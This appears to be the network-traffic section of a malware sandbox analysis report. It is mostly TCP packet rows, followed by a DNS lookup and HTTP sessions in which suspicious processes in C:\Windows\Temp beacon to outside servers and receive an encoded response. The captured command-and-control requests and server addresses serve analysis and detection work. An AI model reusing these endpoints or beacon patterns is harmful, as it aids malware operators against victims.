                                                                                    Nov 8, 2024 11:31:45.886683941 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:45.887023926 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:45.887061119 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:45.887177944 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:45.887280941 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:45.887291908 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:45.887375116 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:45.887454033 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:45.887552023 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.135798931 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.135876894 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.135900974 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.136255026 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.136282921 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.136570930 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.136594057 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.136594057 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.136614084 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.136818886 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.136847019 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.137037039 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.137041092 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.137058020 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.137404919 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.137412071 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.137630939 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.137712955 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.137727976 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.137742043 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.137871981 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.138242006 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.138509989 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.385437012 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.385658026 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.386213064 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.386329889 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.386512995 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.386528015 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.386921883 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.387171030 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.387301922 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.387499094 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.387660027 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.387676954 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.387693882 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.388001919 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.388268948 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.388653994 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.388669014 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.389117002 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.432475090 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.634733915 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.634803057 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.634902000 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.634915113 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.635170937 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.635629892 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.635633945 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.635783911 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.635792017 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.635951996 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.635988951 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.635994911 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.636106014 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.636457920 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.636603117 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.636630058 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.636645079 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.636650085 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.636769056 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.637408018 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.637433052 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.637563944 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.637614965 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.637679100 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.638325930 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.638448000 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.638468981 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.638474941 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.638588905 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.638588905 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.884428978 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.884607077 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.884773970 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.884943962 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.884949923 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.885099888 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.885413885 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.885612011 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.886347055 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.886563063 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.886564016 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.886568069 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.887191057 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.887228966 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.887228966 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.887233973 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.887610912 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.887614965 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.888014078 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.888093948 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.888375044 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.888375044 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.888381004 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.889064074 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.889086008 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.889152050 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.889152050 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.889157057 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.889885902 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.890299082 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.890302896 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.890448093 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.890882969 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.891650915 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:46.891654968 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:46.892222881 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.134038925 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.134154081 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.134790897 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.134804010 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.134870052 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.135015011 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.135694981 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.135961056 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.135968924 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.136614084 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.136921883 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.136921883 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.136929989 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.137566090 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.138559103 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.138572931 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.139600992 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.139606953 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.140121937 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.140135050 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.140753984 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.140758991 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.140994072 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.140994072 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.141005039 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.141089916 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.141094923 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.141464949 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.383557081 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.383563042 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.384886026 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.384900093 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.386151075 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.386312962 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.387079000 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.387089014 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.387932062 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.387947083 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.388158083 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.388168097 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.389113903 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.389497995 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.389605045 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.389616966 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.390652895 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.390661001 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.391036987 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.391403913 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.391417980 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.391805887 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.391813040 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.392376900 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.392761946 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.393017054 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.393029928 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.393804073 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.394299984 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.394309998 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.394882917 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.448663950 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.633332968 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.633337021 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.633429050 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.633622885 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.633789062 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.633801937 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.634162903 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.636359930 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.636363029 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.636426926 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.636470079 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.636543036 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.636543036 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.636596918 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.636606932 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.636693001 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.636776924 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.638119936 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.638130903 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.638402939 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.638412952 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.638494015 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.638668060 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.639950037 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.639964104 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.640117884 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.640117884 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.640248060 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.640256882 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.640417099 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.641654968 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.641664028 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.641937971 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.641947985 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.642081022 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.643682957 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.643692970 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.643858910 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.643858910 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.643878937 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.643884897 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.643928051 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.643928051 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.644057989 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.645315886 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.645425081 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.645587921 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.645598888 CET44349795104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:31:47.645720959 CET49795443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:31:47.645864010 CET49795443192.168.11.30104.21.86.219

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 8, 2024 11:29:28.106837988 CET6057453192.168.11.301.1.1.1
                                                                                    Nov 8, 2024 11:29:28.213152885 CET53605741.1.1.1192.168.11.30

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 8, 2024 11:29:28.106837988 CET192.168.11.301.1.1.10x793eStandard query (0)uyt1n8ded9fb380.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 8, 2024 11:29:28.213152885 CET1.1.1.1192.168.11.300x793eNo error (0)uyt1n8ded9fb380.com104.21.86.219A (IP address)IN (0x0001)false
                                                                                    Nov 8, 2024 11:29:28.213152885 CET1.1.1.1192.168.11.300x793eNo error (0)uyt1n8ded9fb380.com172.67.137.62A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • uyt1n8ded9fb380.com
                                                                                    • 23.88.71.29:8000
                                                                                    • 206.206.126.252:8008

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.3049788104.21.86.219804540C:\Windows\Temp\svczHost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 8, 2024 11:30:15.493923903 CET78OUTGET /api/check HTTP/1.1
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Connection: Keep-Alive
                                                                                    Nov 8, 2024 11:30:16.187975883 CET1289INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:30:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-store,no-cache
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7xPAUTSdsNoWPkxdTLj4UXjZ8nn6sWwRpg7bjzYuGpRgGm0f2euWiLSG0TMWcN7fIjuH3%2BVcIP%2FYJfLOClqAhSGytCJ2sHY%2Bhd2JKx1%2Fmd9M0XiHThLk6SrXf3tb%2FIRoQIXgcLUC0wM"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=47347&sent=68&recv=69&lost=0&retrans=0&sent_bytes=24414&recv_bytes=29531&delivery_rate=2279469&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    vary: accept-encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2fb2aad200c-IAD
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=117913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=78&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 31 36 33 0d 0a 31 37 33 31 30 36 31 38 31 35 7c 58 41 6e 35 61 6c 61 45 70 7a 34 59 4e 51 44 32 56 76 38 6a 38 52 56 7a 47 58 2b 7a 33 6f 63 50 38 34 46 65 6e 68 6e 6b 5a 62 73 4a 33 35 58 44 77 42 2b 6c 56 5a 67 41 6f 62 30 70 6b 6c 70 31 4a 4b 73 70 2b 4a 36 50 59 76 78 6b 39 4e 71 42 4a 32 6c 76 61 63 36 61 57 36 6b 72 72 63 4d 6d 6e 73 7a 33 52 69 36 55 51 66 36 30 42 6b 2b 62 66 65 5a 50 6d 52 6d 69 73 65 30 73 78 62 42 69 79 35 6f 55 39 78 33 67 74 35 47 5a 48 62 6d 36 4f 68 78 30 35 32 37 4a 49 47 6f 31 78 44 79 71 46 74 69 53 68 74 34 39 33 2b 2b 43 74 50 4b 4d 2f 37 43 6c 65 45 6e 4e 2f 50 7a 6f 73 4f 4a 63 52 64 75 46 5a 71 4f 68 33 30 48 63 55 69 53 4d 61 53 44 77 71 45 6c 30 6f 43 69 68 62 64 74 75 30 59 42 42 36 4c 56
                                                                                    Data Ascii: 1631731061815|XAn5alaEpz4YNQD2Vv8j8RVzGX+z3ocP84FenhnkZbsJ35XDwB+lVZgAob0pklp1JKsp+J6PYvxk9NqBJ2lvac6aW6krrcMmnsz3Ri6UQf60Bk+bfeZPmRmise0sxbBiy5oU9x3gt5GZHbm6Ohx0527JIGo1xDyqFtiSht493++CtPKM/7CleEnN/PzosOJcRduFZqOh30HcUiSMaSDwqEl0oCihbdtu0YBB6LV
                                                                                    Nov 8, 2024 11:30:16.187999964 CET115INData Raw: 73 76 72 54 75 50 67 44 48 6f 6a 6c 53 77 6e 79 59 78 52 31 38 76 70 71 75 2f 6c 47 57 4c 4c 50 48 36 70 6b 42 30 4a 64 42 4c 77 36 68 34 54 56 4e 34 67 74 4a 30 4b 37 45 6f 56 66 58 79 38 2f 42 49 69 75 4a 61 76 59 41 47 57 78 68 7a 45 61 57 54
                                                                                    Data Ascii: svrTuPgDHojlSwnyYxR18vpqu/lGWLLPH6pkB0JdBLw6h4TVN4gtJ0K7EoVfXy8/BIiuJavYAGWxhzEaWT8qFTzY2D4ssF6aejLLkDbRw+ZtZBA==
                                                                                    Nov 8, 2024 11:30:16.188007116 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.304979223.88.71.2980008188C:\Windows\Temp\myRdpService.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 8, 2024 11:31:24.487179995 CET164OUTGET /client/ws HTTP/1.1
                                                                                    Host: 23.88.71.29:8000
                                                                                    Connection: Upgrade
                                                                                    Upgrade: websocket
                                                                                    Sec-WebSocket-Key: pn3oXTss402VH4Y/XnVBsg==
                                                                                    Sec-WebSocket-Version: 13
                                                                                    Nov 8, 2024 11:31:25.237196922 CET1289INHTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Upgrade: websocket
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/8.5
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yVEgt7F7xqqbgedDhnEviGnUrgmodtXc0CqYuupY0EeXaUzosE9SZSNv%2Fi4UrUHNzIy5y7Qf0F4eEvDzv8e1uviGhV0srFqBPMoM5hMierfmpo0hAX5lnG%2FFJPvhn7lAx%2Bag9dTvNtXT"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    CF-RAY: 8df4e4aaaabdd2df-FRA
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=15965&sent=514&recv=202&lost=0&retrans=0&sent_bytes=455874&recv_bytes=24813&delivery_rate=1809810&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Date: Fri, 08 Nov 2024 10:31:24 GMT
                                                                                    Content-Length: 4852
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
